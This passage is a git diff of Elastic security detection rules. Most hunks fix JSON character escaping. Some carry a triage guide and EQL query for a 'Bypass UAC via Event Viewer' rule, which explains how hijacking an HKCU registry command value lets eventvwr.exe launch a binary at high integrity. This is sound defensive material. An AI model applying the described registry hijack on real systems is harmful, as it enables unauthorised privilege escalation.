b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json index 182ea8871aa..49f5317802e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json +++ b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_101.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json index 26e3c08f73b..367781ada6a 100644 --- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_101.json @@ -37,7 +37,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json index 7b814561d70..131fa23f192 100644 --- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_102.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json index fc14192674a..42baeca35be 100644 --- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_103.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json index 710f6976614..9fdd24e2467 100644 --- a/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/31295df3-277b-4c56-a1fb-84e31b4222a9_104.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json index 111407f5946..729668ba3c6 100644 --- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json index 17441ee5a2b..6ea1613585c 100644 --- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", "related_integrations": [ { @@ -50,7 +50,7 @@ ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json index 0d968a71425..515ded88fc0 100644 --- a/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json +++ b/packages/security_detection_engine/kibana/security_rule/31b4c719-f2b4-41f6-a9bd-fce93c2eaf62_106.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive 